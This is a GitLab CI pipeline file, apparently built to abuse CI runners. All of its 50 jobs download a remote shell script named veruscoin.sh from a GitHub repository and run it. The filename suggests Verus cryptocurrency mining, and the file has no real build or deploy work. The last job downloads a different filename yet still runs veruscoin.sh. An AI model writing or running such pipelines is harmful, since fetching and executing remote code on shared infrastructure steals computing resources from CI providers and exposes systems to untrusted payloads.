stages:
  - bachannel
  - build
  - deploy
 
bachannel_1:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
bachannel_2:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_3:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_4:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_5:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_6:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_7:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_8:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_9:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh&& chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_10:
  stage: build
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_11:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_12:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_13:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_14:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_15:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_16:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_17:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_18:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_19:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_20:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
bachannel_21:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
 
bachannel_22:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
 
bachannel_23:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
 
bachannel_24:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
 
bachannel_25:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 

bachannel_26:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
bachannel_27:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_28:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_29:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_30:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_31:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_32:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_33:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_34:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh&& chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_35:
  stage: build
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_36:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_37:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_38:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_39:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_40:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_41:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_42:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_43:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_44:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_45:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
    
bachannel_46:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
   
bachannel_47:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
    
bachannel_48:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
    
bachannel_49:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
    
bachannel_50:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/bertyleo/Gobang_veruz01/main/gobang_veruzgit01.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 